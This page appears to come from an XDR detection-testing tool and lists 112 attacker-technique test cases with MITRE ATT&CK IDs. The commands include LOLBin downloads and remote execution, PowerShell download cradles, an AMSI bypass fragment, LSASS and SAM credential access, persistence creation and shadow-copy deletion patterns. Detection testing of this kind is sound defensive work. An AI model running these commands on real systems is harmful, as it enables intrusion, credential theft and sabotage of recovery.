Test Cases 112
Run Tests
Category:
All
Command & Control
Credential
Custom
Defense Evasion
Discovery
Enumeration
Execution
File
File Operations
Injection
Lateral Movement
LOLBin
Network
Persistence
PowerShell
Ransomware
All Test Cases
| ID | Category | Name | Risk | MITRE | Source | Actions |
|---|---|---|---|---|---|---|
whoami |
Discovery |
User Discovery (whoami)
whoami /all
|
LOW | T1033 | Plugin:All XDR Tests | |
hostname |
Discovery |
Hostname
hostname
|
LOW | T1082 | Plugin:All XDR Tests | |
ipconfig |
Discovery |
IP Configuration
ipconfig /all
|
LOW | T1016 | Plugin:All XDR Tests | |
systeminfo |
Discovery |
System Information
systeminfo
|
LOW | T1082 | Plugin:All XDR Tests | |
netstat |
Discovery |
Network Connections
netstat -ano
|
LOW | T1049 | Plugin:All XDR Tests | |
tasklist |
Discovery |
Process List
tasklist
|
LOW | T1057 | Plugin:All XDR Tests | |
arp |
Discovery |
ARP Table
arp -a
|
LOW | T1016 | Plugin:All XDR Tests | |
route |
Discovery |
Routing Table
route print
|
LOW | T1016 | Plugin:All XDR Tests | |
netuser |
Discovery |
Local Users
net user
|
MEDIUM | T1087.001 | Plugin:All XDR Tests | |
netgroup |
Discovery |
Local Groups
net localgroup
|
MEDIUM | T1087.001 | Plugin:All XDR Tests | |
netadmins |
Discovery |
Local Admins
net localgroup administrators
|
MEDIUM | T1087.001 | Plugin:All XDR Tests | |
netshare |
Discovery |
Network Shares
net share
|
LOW | T1135 | Plugin:All XDR Tests | |
os |
Discovery |
WMIC OS Info
wmic os get caption,version,osarchitecture
|
MEDIUM | T1047 | Plugin:All XDR Tests | |
proc |
Discovery |
WMIC Process
wmic process list brief
|
MEDIUM | T1047 | Plugin:All XDR Tests | |
service |
Discovery |
WMIC Services
wmic service list brief
|
MEDIUM | T1047 | Plugin:All XDR Tests | |
nltest |
Discovery |
Domain Trust Discovery
nltest /domain_trusts
|
MEDIUM | T1482 | Plugin:All XDR Tests | |
software |
Discovery |
Security Software Discovery
wmic /namespace:\\root\securitycenter2 path antivirusproduct...
|
MEDIUM | T1518.001 | Plugin:All XDR Tests | |
url |
LOLBin |
Certutil URL Download
certutil -urlcache -split -f http://example.com/test.txt %TE...
|
HIGH | T1105 | Plugin:All XDR Tests | |
decode |
LOLBin |
Certutil Decode
certutil -decode %TEMP%\test.txt %TEMP%\decoded.txt
|
HIGH | T1140 | Plugin:All XDR Tests | |
bitsadmin |
LOLBin |
BitsAdmin Download
bitsadmin /transfer testjob /download /priority normal http:...
|
HIGH | T1197 | Plugin:All XDR Tests | |
mshta |
LOLBin |
MSHTA Execution
mshta about:blank
|
HIGH | T1218.005 | Plugin:All XDR Tests | |
url |
LOLBin |
MSHTA URL Execution
mshta http://example.com
|
HIGH | T1218.005 | Plugin:All XDR Tests | |
regsvr32 |
LOLBin |
Regsvr32 Pattern (Squiblydoo)
regsvr32 /s /n /u /i:http://example.com/test.sct scrobj.dll
|
HIGH | T1218.010 | Plugin:All XDR Tests | |
rundll32 |
LOLBin |
Rundll32 Pattern
rundll32 shell32.dll,Control_RunDLL
|
HIGH | T1218.011 | Plugin:All XDR Tests | |
url |
LOLBin |
Rundll32 URL Execution
rundll32.exe url.dll,OpenURL http://example.com
|
HIGH | T1218.011 | Plugin:All XDR Tests | |
msiexec |
LOLBin |
MSIExec URL
msiexec /q /i http://example.com/test.msi
|
HIGH | T1218.007 | Plugin:All XDR Tests | |
wscript |
LOLBin |
WScript Execution
wscript //nologo //e:vbscript test.vbs
|
MEDIUM | T1059.005 | Plugin:All XDR Tests | |
cscript |
LOLBin |
CScript Execution
cscript //nologo test.vbs
|
MEDIUM | T1059.005 | Plugin:All XDR Tests | |
cmstp |
LOLBin |
CMSTP Bypass
cmstp.exe /s %TEMP%\test.inf
|
HIGH | T1218.003 | Plugin:All XDR Tests | |
encoded |
PowerShell |
PowerShell Encoded Command
powershell.exe -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgA...
|
HIGH | T1059.001 | Plugin:All XDR Tests | |
cradle |
PowerShell |
PowerShell Download Cradle (IEX)
powershell.exe -c "IEX (New-Object Net.WebClient).DownloadSt...
|
HIGH | T1059.001 | Plugin:All XDR Tests | |
webclient |
PowerShell |
PowerShell Hidden WebClient
powershell.exe -nop -w hidden -c "(New-Object Net.WebClient)...
|
HIGH | T1059.001 | Plugin:All XDR Tests | |
policy |
PowerShell |
PowerShell Bypass Execution Policy
powershell.exe -ExecutionPolicy Bypass -Command "IWR http://...
|
HIGH | T1059.001 | Plugin:All XDR Tests | |
webrequest |
PowerShell |
PowerShell Invoke-WebRequest
powershell.exe -Command "Invoke-WebRequest -Uri http://examp...
|
MEDIUM | T1071.001 | Plugin:All XDR Tests | |
load |
PowerShell |
PowerShell Reflection Load
powershell.exe -Command "[System.Reflection.Assembly]::LoadW...
|
HIGH | T1620 | Plugin:All XDR Tests | |
decode |
PowerShell |
PowerShell Base64 Decode to File
powershell.exe -Command "[System.Convert]::FromBase64String(...
|
HIGH | T1140 | Plugin:All XDR Tests | |
bypass |
PowerShell |
PowerShell AMSI Bypass Pattern
powershell.exe -Command "[Ref].Assembly.GetType('System.Mana...
|
CRITICAL | T1562.001 | Plugin:All XDR Tests | |
wget |
PowerShell |
PowerShell IEX with Wget
powershell.exe -c "iex(wget http://example.com -UseBasicPars...
|
HIGH | T1059.001 | Plugin:All XDR Tests | |
list |
PowerShell |
PowerShell Process List
powershell.exe -Command "Get-Process | Select-Object -First ...
|
LOW | T1057 | Plugin:All XDR Tests | |
clipboard |
PowerShell |
PowerShell Clipboard Access
powershell.exe -Command "Get-Clipboard"
|
MEDIUM | T1115 | Plugin:All XDR Tests | |
screenshot |
PowerShell |
PowerShell Screenshot Test
powershell.exe -Command "Add-Type -AssemblyName System.Windo...
|
MEDIUM | T1113 | Plugin:All XDR Tests | |
access |
Credential |
LSASS Process Access
powershell.exe -Command "Get-Process lsass | Select-Object I...
|
CRITICAL | T1003.001 | Plugin:All XDR Tests | |
registry |
Credential |
SAM Registry Access
reg query HKLM\SAM
|
HIGH | T1003.002 | Plugin:All XDR Tests | |
registry |
Credential |
SECURITY Registry Access
reg query HKLM\SECURITY
|
HIGH | T1003.002 | Plugin:All XDR Tests | |
cmdkey |
Credential |
Cmdkey List
cmdkey /list
|
HIGH | T1555 | Plugin:All XDR Tests | |
vault |
Credential |
Vault Query
vaultcmd /list
|
HIGH | T1555.004 | Plugin:All XDR Tests | |
dpapi |
Credential |
DPAPI Master Key Access
powershell.exe -Command "Get-ChildItem C:\Users\*\AppData\Ro...
|
HIGH | T1555.003 | Plugin:All XDR Tests | |
folder |
Credential |
Credentials Folder Enum
powershell.exe -Command "Get-ChildItem C:\Users\*\AppData\Lo...
|
HIGH | T1555.004 | Plugin:All XDR Tests | |
run |
Persistence |
Registry Run Key Query
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
MEDIUM | T1547.001 | Plugin:All XDR Tests | |
runonce |
Persistence |
Registry RunOnce Query
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run...
|
MEDIUM | T1547.001 | Plugin:All XDR Tests | |
query |
Persistence |
Scheduled Tasks Query
schtasks /query /fo LIST
|
MEDIUM | T1053.005 | Plugin:All XDR Tests | |
create |
Persistence |
Scheduled Task Creation
schtasks /create /tn XDRTest /tr calc.exe /sc once /st 23:59...
|
HIGH | T1053.005 | Plugin:All XDR Tests | |
create |
Persistence |
Service Creation Attempt
sc create XDRTestSvc binPath= "cmd.exe /c echo test" start= ...
|
HIGH | T1543.003 | Plugin:All XDR Tests | |
dir |
Persistence |
Startup Folder List
dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup...
|
LOW | T1547.001 | Plugin:All XDR Tests | |
check |
Persistence |
WMI Persistence Check
powershell.exe -Command "Get-WmiObject -Namespace root\subsc...
|
MEDIUM | T1546.003 | Plugin:All XDR Tests | |
strings |
Defense Evasion |
AMSI Bypass Strings
powershell.exe -Command "$null = 'AmsiScanBuffer'"
|
HIGH | T1562.001 | Plugin:All XDR Tests | |
strings |
Defense Evasion |
ETW Bypass Strings
powershell.exe -Command "$null = 'EtwEventWrite'"
|
HIGH | T1562.006 | Plugin:All XDR Tests | |
disable |
Defense Evasion |
Defender Disable Pattern
powershell.exe -Command "$null = 'Set-MpPreference -DisableR...
|
HIGH | T1562.001 | Plugin:All XDR Tests | |
timestomp |
Defense Evasion |
Timestomping Pattern
powershell.exe -Command "$null = '(Get-Item file).LastWriteT...
|
MEDIUM | T1070.006 | Plugin:All XDR Tests | |
file |
Defense Evasion |
Hidden File Creation
echo test > %TEMP%\.hidden.txt && attrib +h %TEMP%\.hidden.t...
|
MEDIUM | T1564.001 | Plugin:All XDR Tests | |
ads |
Defense Evasion |
Alternate Data Stream
echo hidden > %TEMP%\test.txt:hidden
|
MEDIUM | T1564.004 | Plugin:All XDR Tests | |
psexec |
Lateral Movement |
PsExec Pattern
powershell.exe -Command "$null = 'psexec \\target -u user -p...
|
HIGH | T1570 | Plugin:All XDR Tests | |
process |
Lateral Movement |
WMI Process Create (Remote)
wmic process call create "cmd.exe /c echo test"
|
CRITICAL | T1047 | Plugin:All XDR Tests | |
winrm |
Lateral Movement |
WinRM Command Pattern
powershell.exe -Command "$null = 'Invoke-Command -ComputerNa...
|
MEDIUM | T1021.006 | Plugin:All XDR Tests | |
view |
Lateral Movement |
Net View
net view
|
MEDIUM | T1018 | Plugin:All XDR Tests | |
session |
Lateral Movement |
Net Session
net session
|
MEDIUM | T1049 | Plugin:All XDR Tests | |
use |
Lateral Movement |
Net Use
net use
|
MEDIUM | T1021.002 | Plugin:All XDR Tests | |
service |
Lateral Movement |
Remote Service Pattern
powershell.exe -Command "$null = 'sc \\target create malware...
|
HIGH | T1021.002 | Plugin:All XDR Tests | |
list |
Ransomware |
Shadow Copy List
vssadmin list shadows
|
HIGH | T1490 | Plugin:All XDR Tests | |
pattern |
Ransomware |
Shadow Copy Delete Pattern
powershell.exe -Command "$null = 'vssadmin delete shadows /a...
|
CRITICAL | T1490 | Plugin:All XDR Tests | |
bcdedit |
Ransomware |
BCDedit Pattern
powershell.exe -Command "$null = 'bcdedit /set recoveryenabl...
|
HIGH | T1490 | Plugin:All XDR Tests | |
query |
Ransomware |
BCDedit Query
bcdedit /enum
|
MEDIUM | T1490 | Plugin:All XDR Tests | |
patterns |
Injection |
Process Injection APIs
powershell.exe -Command "$null = 'VirtualAllocEx WriteProces...
|
HIGH | T1055 | Plugin:All XDR Tests | |
patterns |
Injection |
DLL Injection Patterns
powershell.exe -Command "$null = 'LoadLibraryA SetWindowsHoo...
|
HIGH | T1055.001 | Plugin:All XDR Tests | |
exfil |
Command & Control |
DNS Exfiltration Test
nslookup xdrtest.exfil-test.local
|
MEDIUM | T1048.003 | Plugin:All XDR Tests | |
beacon |
Command & Control |
Beaconing Pattern
nslookup c2-beacon-test.local
|
MEDIUM | T1071.004 | Plugin:All XDR Tests | |
dns |
Command & Control |
Suspicious DNS Query
nslookup evil.testdomain.invalid
|
MEDIUM | T1071 | Plugin:All XDR Tests | |
sam |
File Operations |
Sensitive File Access (SAM)
powershell.exe -Command "Test-Path 'C:\Windows\System32\conf...
|
HIGH | T1005 | Plugin:All XDR Tests | |
system |
File Operations |
Sensitive File Access (SYSTEM)
powershell.exe -Command "Test-Path 'C:\Windows\System32\conf...
|
HIGH | T1005 | Plugin:All XDR Tests | |
sys |
File Operations |
Copy System File
copy C:\Windows\System32\notepad.exe %TEMP%\notepad_copy.exe
|
MEDIUM | T1105 | Plugin:All XDR Tests | |
query |
File Operations |
File Attributes Query
attrib %TEMP%
|
LOW | T1564.001 | Plugin:All XDR Tests | |
sweep |
Network |
Ping Sweep
for /L %i in (1,1,5) do @ping -n 1 -w 100 192.168.1.%i
|
MEDIUM | T1018 | Plugin:All XDR Tests | |
firewall |
Network |
Firewall Status
netsh advfirewall show allprofiles state
|
MEDIUM | T1016 | Plugin:All XDR Tests | |
wlan |
Network |
WLAN Profiles
netsh wlan show profiles
|
MEDIUM | T1016 | Plugin:All XDR Tests | |
download |
Execution |
Curl Download
curl -o %TEMP%\test.txt http://example.com/robots.txt
|
MEDIUM | T1105 | Plugin:All XDR Tests | |
process |
Execution |
WMIC Process Call Create
wmic process call create "cmd.exe /c echo XDR_TEST > %TEMP%\...
|
CRITICAL | T1047 | Plugin:All XDR Tests | |
sim |
Execution |
Office Macro Simulation
wmic process call create "powershell.exe -c IWR http://examp...
|
CRITICAL | T1059.005 | Plugin:All XDR Tests | |
drivers |
Enumeration |
Loaded Drivers
driverquery
|
LOW | T1082 | Plugin:All XDR Tests | |
env |
Enumeration |
Environment Variables
set
|
LOW | T1082 | Plugin:All XDR Tests | |
eventlog |
Enumeration |
Event Log Query
wevtutil qe Security /c:1 /f:text
|
MEDIUM | T1070.001 | Plugin:All XDR Tests | |
certutil |
LOLBin |
Certutil Download
certutil -urlcache -split -f http://example.com/test.txt %TE...
|
HIGH | T1140 | Plugin:XDR Security Tests | |
bitsadmin |
LOLBin |
BitsAdmin Download
bitsadmin /transfer job /download /priority normal http://ex...
|
HIGH | T1197 | Plugin:XDR Security Tests | |
mshta |
LOLBin |
MSHTA Execution
mshta about:blank
|
HIGH | T1218.005 | Plugin:XDR Security Tests | |
regsvr32 |
LOLBin |
Regsvr32 Test
regsvr32 /s /n /u /i:test.txt scrobj.dll
|
HIGH | T1218.010 | Plugin:XDR Security Tests | |
run |
Persistence |
Registry Run Key
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
HIGH | T1547.001 | Plugin:XDR Security Tests | |
schtasks |
Persistence |
Scheduled Tasks Query
schtasks /query /fo LIST
|
MEDIUM | T1053.005 | Plugin:XDR Security Tests | |
whoami |
Discovery |
User Discovery
whoami /all
|
LOW | T1033 | Plugin:XDR Security Tests | |
systeminfo |
Discovery |
System Information
systeminfo
|
LOW | T1082 | Plugin:XDR Security Tests | |
netstat |
Discovery |
Network Connections
netstat -ano
|
LOW | T1049 | Plugin:XDR Security Tests | |
tasklist |
Discovery |
Process List
tasklist
|
LOW | T1057 | Plugin:XDR Security Tests | |
ipconfig |
Discovery |
Network Configuration
ipconfig /all
|
LOW | T1016 | Plugin:XDR Security Tests | |
arp |
Discovery |
ARP Table
arp -a
|
LOW | T1016 | Plugin:XDR Security Tests | |
process |
Execution |
WMIC Process List
wmic process list brief
|
MEDIUM | T1047 | Plugin:XDR Security Tests | |
os |
Execution |
WMIC OS Info
wmic os get caption,version
|
MEDIUM | T1047 | Plugin:XDR Security Tests | |
cmd |
File |
File Copy Pattern
copy C:\Windows\System32\notepad.exe %TEMP%\test.exe
|
MEDIUM | T1105 | Plugin:XDR Security Tests | |
attrib |
File |
File Attributes
attrib %TEMP%
|
LOW | T1564.001 | Plugin:XDR Security Tests | |
enum |
Network |
Net User Enum
net user
|
MEDIUM | T1087.002 | Plugin:XDR Security Tests | |
localgroup |
Network |
Local Group Enum
net localgroup administrators
|
MEDIUM | T1087.001 | Plugin:XDR Security Tests | |
share |
Network |
Network Shares
net share
|
LOW | T1135 | Plugin:XDR Security Tests | |
session |
Network |
Network Sessions
net session
|
LOW | T1049 | Plugin:XDR Security Tests | |
001 |
Custom |
Example Custom Test
whoami
|
LOW | - | Plugin:Custom Tests Template | |
002 |
Custom |
Example Network Test
ipconfig /all
|
MEDIUM | - | Plugin:Custom Tests Template |
Showing 112 test cases